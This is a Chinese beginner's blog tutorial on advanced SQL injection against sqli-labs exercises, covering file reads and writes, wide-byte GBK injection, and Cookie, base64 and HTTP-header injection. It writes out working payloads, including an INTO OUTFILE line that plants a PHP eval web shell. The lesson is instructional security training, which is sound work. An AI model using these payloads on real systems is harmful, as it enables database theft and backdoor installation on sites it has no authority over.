其它SQL注入(web安全入门09)

最新推荐文章于 2024-07-07 17:29:21 发布
最新推荐文章于 2024-07-07 17:29:21 发布
阅读量1.2k 收藏
点赞数
分类专栏: web安全入门 文章标签: web安全 sql mysql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_32277727/article/details/122753920
版权

一、SQL 注入文件读写

1.1 前提条件

我们也可以利用 SQL 注入漏洞读写文件。但是读写文件需要一定的条件。

1、secure-file-priv

可以再 phpmyadmin 中查看该变量,该参数在高版本的 mysql 数据库中限制了文件的导入

导出。

改参数可以写在 my.ini 配置文件中[mysqld]下。若要配置此参数,需要修改 my.ini 配置文

件,并重启 mysql 服务。

打开 D:\phpStudy\MySQL\my.ini 配置文件,在[mysqld]下添加 secure-file-priv

关于该参数的相关说明

在这里插入图片描述

2、当前用户具有文件权限

查询语句 select File_priv from mysql.user where user=“root” and host=“localhost”

在这里插入图片描述

3、知道要写入目标文件的绝对路径

1.2 读取文件操作

[… union select 1,load_file(‘C:\Windows\System32\drivers\etc\hosts’),3 --+]

使用 load_file(’’)函数

注意:在 windows 系统中,两种路径都可以

C:\Windows\System32\drivers\etc\hosts

C:/Windows/System32/drivers/etc/hosts

1.3 写入文件操作

[?id=-33 union select 1,’<?php phpinfo();?>’,3 into outfile ‘c:\phpstudy\www\1.php’ ]

[?id=-33 union select 1,’<?php @eval($_REQUESTS[777]);?>’,3 into outfile

‘c:\phpstudy\www\2.php’ ]

如果页面不报错,说明写入成功。可以直接访问写入文件[http://localhost/1.php]

二、宽字节注入

我们通过 sqli-labs 第 32 关来测试

使用[?id=1],页面有回显,使用联合注入查询

使用[?id=1’]测试的时候,会发现单引号被[]转移

测试网站的编码是 GBK 编码,其采用双字节编码范围,GBK 的编码范围,8140-FEFE(高

字节从 81 到 FE,低字节从 40 到 FE)

我们可以在单引号之前提交一个十六进制的字符,与 5c(也就是字符\)组成以一个 GBK 编

码的汉字。这样 SQL 语句传入数据库的时候,转移字符 5c ,会被看作 GBK 汉字的低字节

位,从而失去转义的作用。

如果我们提交[?id=1000%df’ union select 1,2,3–+],就可以使用联合查询注入了。

不仅仅是[df],在高字节范围之内的都可以

0xdf5c 就是一个汉字“運”

三、Cookie 注入

我们使用 sqli-labs 第 20 关来说明 Cookie 注入的问题

Cookie 注入的注入参数需要通过 Cookie 提交,可以通过[document.cookie],在控制台完成

对浏览器 Cookie 的读写。

在控制台输入,然后刷新页面

document.cookie=“uname =Dumb’ and extractvalue(1,concat(0x7e,database(),0x7e))#”

在 bp 中提交

在这里插入图片描述

这里必须用#或者-- (–空格)注释,不能用–+注释。

四、base64 注入

我们以 sqli-labs 第 22 关来说明 base64 注入的问题。

发现页面报时区错误,解决方法,修改 php.ini 文件。
在这里插入图片描述

base 注入 就是将注入的字段经过 base64 编码,发现 22 关是输入 Cookie 型的 base64 注

入,使用报错注入手法

uname =Dumb" and updatexml(1,concat(0x5e,version(),0x5e),1)#

base64 编码之后:

RHVtYiIgYW5kIHVwZGF0ZXhtbCgxLGNvbmNhdCgweDVlLHZlcnNpb24oKSwweDVlKSwxKS

M=

在这里插入图片描述

五、HTTP 头部注入

http 头部注入就是指注入字段在 HTTP 头部的字段中,这些字段通常有 User-Agent、Referer

等。

1、User-Agent 注入

如 sqli-labs 第 18 关

payload

[User-Agent:hacker’ and updatexml(1,concat(0xx5e,version(),0x5e),1) and ‘1’='1]

在这里插入图片描述

2、Referer 注入

第 19 关,注入字段在 Referer 中

[hacker’ and updatexml(1,concat(0x5e,version(),0x5e),1) and ‘1’='1]

在这里插入图片描述

黑战士安全
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
MySQL导出数据遇到secure-file-priv问题的解决方法
09-09
主要为大家详细介绍了MySQL导出数据遇到secure-file-priv问题的解决方法,具有一定的参考价值,感兴趣的小伙伴们可以参考一下
第四天sql load_file&报错注入简单用法
代码审计
03-05 2389
1. sql注入 使用的前提: a) 需要一个可控的参数点 b) 需要无过滤或者是过滤不充分 插入的payload被数据库执行 分类: 按照注入的数据类型: a) 整数型 不需要闭合单双引号 b) 字符型 需要闭合单双引号 按照注入的方式: a) 联合查询注入 b) 报错注入 c) 基于bool的注入 d) 基于时间的注入 e) 堆叠注入 如何快速判断是否存在sql注入? 1.使用单双引号 看是否报错 2.使用四则运算 看是否是整数型 3. 使用bool判断 and 1=1
MySQL导出查询数据出现--secure-file-priv选项问题
小景的博客
05-13 6422
一、问题描述 Windows平台的MySQL5.7.12版本使用以下命令导出查询结果到Excel文件时,会出现问题 select sid, sname, age from student into outfile 'D:/Files/student.xlsx'; ERROR 1290 (HY000): The MySQL server is running with the --secu...
SQL注入篇——文件读写注入
爱国小白帽
02-10 4102
文件读写注入的原理 就是利用文件的读写权限进行注入 文件读写注入的条件 1、读写文件需要secure_file_priv权限 secure_file_priv= 代表对文件读写没有限制 2.secure_file_priv=NULL 代表不能进行文件读写 secure_file_priv=d:/phpstudy/mysql/data 代表只能对该路径下文件进行读写 2、知道网站绝对路径 Wi...
Mysql中secure_file_priv对读写文件的影响
Jiajiajiang_的博客
01-10 3039
ERROR 1290 (HY000): The MySQL server is running with the –secure-file-priv option so it cannot execute this statement. secure_file_priv是用来限制LOAD DATA,SELECT...OUTFILE,and LOAD_FILE()传到哪个指定目录的 secur...
web安全入门ppt课件.ppt
11-16
Web 安全入门 PPT 课件 本 PPT课件主要介绍了 Web 安全的基础知识,包括 Web 安全初探、Web 漏洞等内容。下面是从本 PPT 课件中提炼出的相关知识点: Web 安全初探 * Web 安全的重要性:Web 应用程序的安全性是...
web渗透测试详细入门实践课程-kali/sql注入
06-20
本课程主要从渗透测试流程、情报收集流程、渗透测试metaspolit终端介绍、nmap扫描、文件包含漏洞、文件上传漏洞、sql注入等方面理论加实操web渗透测试详细专业技术知识。 购买课程的同学可以获取价值200的教学资源...
web安全性测试之sql注入入门
03-30
SQL 注入入门SQL 注入是指攻击者通过构造特殊的 SQL 语句, Inject 到服务器的数据库中,来获取或修改敏感数据的攻击行为。SQL 注入的原理是从客户端提交特殊的代码,从而收集程序及服务器的信息,从而获取你想...
渗透学习入门SQL注入
07-31
渗透学习入门SQL注入 SQL 注入是一种常见的Web 应用程序漏洞,攻击者通过构造恶意输入来访问或控制数据库中的数据。SQL 注入攻击通常发生在Web 应用程序使用用户输入来构建动态SQL 语句时,攻击者可以 inject ...
教程分享Web安全基础入门
03-17
7. **安全漏洞**:学习常见的Web应用漏洞,如SQL注入、跨站脚本(XSS)、文件包含漏洞、命令注入等。理解它们的工作原理和利用方法是提高安全技能的关键。 8. **子域名信息**:子域名挖掘能揭示组织的网络架构,...
SQL注入16】SQL漏洞利用之读写文件
Fighting_hawk的博客
02-22 4329
1. 对文件进行读写既收到文件系统对用户权限的制约、也收到数据库设置的制约。 2. 掌握利用SQL漏洞进行文件读写的方法。 3. 后续需要进一步了解如何获取网站根目录路径的方法。
详述 MySQL 导出数据遇到 secure-file-priv 的问题
热门推荐
CG国斌的博客
10-01 3万+
ERROR 1290 (HY000): The MySQL server is running with the –secure-file-priv option so it cannot execute this statement. 对于上述错误,相信对于第一次执行 MySQL 数据导出操作的同学大都会遇见。至于为什么会遇到这个错误,原因很简单,那就是:我们不知道 MySQL 默认的导出目录是哪
SQL注入详解
qq_48904485的博客
03-21 2万+
针对SQL注入的攻击行为可描述为通过用户可控参数中注入SQL语法,破坏原有SQL结构,达到编写程序意料之外结果的攻击行为。 其成因可归结为以下两个原理叠加造成: 1、程序编写者在处理程序和数据库交互时,使用字符串凭借的方式构造SQL语句。 2、未对用户可控参数进行足够的过滤便将参数内容拼接进入到SQL语句中。 SQL注入的攻击方式分为:报错注入、布尔盲注 、延时注入、堆叠查询、联合查询 、二次注入等等
SQL无列名注入方法总结(基于union, join)
DawdleD的博客
05-25 2696
本文要点 通过对基于join的无列名注入攻击的研究,本文提出了一种场景以及对应的攻击方法,该攻击方法不需要使用using关键字。 本文整理了相关的博文,将在篇末展示(由于该篇博文是原创博文所以我不会把它们的内容照搬过来,请自行取阅) 一种基于join的无列名注入-1 select Host,User,Select_priv from user where User="root" 在上述场景中用户可以控制的输入是字符串"root",假设的攻击场景中我们可以突破双引号闭合并进行任意sql注入。但是我们
MySQL默认库及读写文件
Wawyw's Blog
02-20 371
1、MySQL默认库 1.1、information_schema 在MySQL中,把 information_schema 看作是一个数据库,确切说是信息数据库。其中保存着关于MySQL服务器所维护的所有其他数据库的信息。如数据库名,数据库的表,字段类型与访问权 限等。 查询数据库、表名、字段等信息 # 爆所有用户 select group_concat(user) from mysql.user; # 爆所有数据库 select group_concat(SCHEMA_NAME) from inf
网络安全测评技术与标准
weixin_48579910的博客
07-06 646
网络安全测评通过多种方法和工具对系统、网络和应用程序进行全面评估,以发现和修复潜在的安全漏洞,确保其符合安全标准和政策。结合渗透测试、漏洞扫描、安全审计、风险评估、合规性测试、代码审查、社会工程测试、配置评估和基准测试等多种类型的测评,组织可以全面提升其网络安全防护能力,保护其信息资产和业务连续性。网络安全测评流程包括准备阶段、信息收集阶段、漏洞扫描阶段、渗透测试阶段、安全审计阶段、风险评估阶段、报告阶段、修复和验证阶段以及持续监控和改进阶段。
【网络安全】实验一(网络拓扑环境的搭建)
最新发布
Elena's Blog
07-07 239
学习利用 VMware 创建虚拟环境学习利用 VMware 搭建各自网络拓扑环境。
有2000元的不死高防吗
m0_70754056的博客
07-04 190
在网上搜索高防服务时,我们经常看到有死扛ddos攻击,无视cc攻击 打不死的服务器等字眼,我们必须保持清醒的头脑,因为市场上充斥着各种以低价诱人却暗藏陷阱的所谓“高防产品”。让我们擦亮眼睛,拒绝低价诱惑,为我们的网络世界构建真正坚实可靠的防护堡垒。记住,没有 2000 块的不死高防产品,只有踏实的投入和专业的服务才能保障我们的网络安全。真正有效的高防服务,需要强大的技术支持、硬件设施以及持续的维护和更新。结果在遭受严重的 DDoS 攻击时,所谓的高防形同虚设,导致业务中断,客户流失,造成了无法挽回的损失。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

黑战士安全

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值